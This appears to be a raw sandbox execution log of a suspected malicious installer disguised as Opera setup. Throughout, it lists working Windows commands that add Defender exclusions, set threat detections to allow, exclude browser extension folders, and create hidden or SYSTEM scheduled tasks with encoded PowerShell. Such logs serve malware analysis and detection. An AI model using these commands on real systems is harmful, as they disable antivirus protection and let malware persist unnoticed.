--server-tracking-blob=YTJjM2EyMWQyYzMzY2NlNTJlZDFjMTQyNzgwNzBlYzBkMWM0NWNiMjEyY2QyYTAzMjJmZGY0ZTUxMmE2NGMxZDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjExIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcyMDk3OTg5Ni4wNDkwIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiI4MjFkYTRiNi1kNDNjLTRkNzAtOTkzNy02OTVmMTI2NDM3ZjYifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C06000000000000
C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe
C:\Users\Admin\AppData\Local\Temp\7zSCAD89F79\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=112.0.5197.24 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x7148b1f4,0x7148b200,0x7148b20c
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1852,6144302509164041047,9357137224680228676,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5364 /prefetch:2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe"
C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe
C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe /did=757674 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1932
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1900
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\Assistant_111.0.5168.25_Setup.exe_sfx.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202407141758221\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=111.0.5168.25 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0xd59f88,0xd59f94,0xd59fa0
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 4396 -ip 4396
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1884
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bEtnHIcecDUtXwQuWS" /SC once /ST 17:59:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe\" z0 /JydidW 757674 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe
C:\Users\Admin\AppData\Local\Temp\rC6Gx24s\IuIL6YzMXvff.exe z0 /JydidW 757674 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gtIkoObEa" /SC once /ST 15:29:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gtIkoObEa"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\svchost.exe
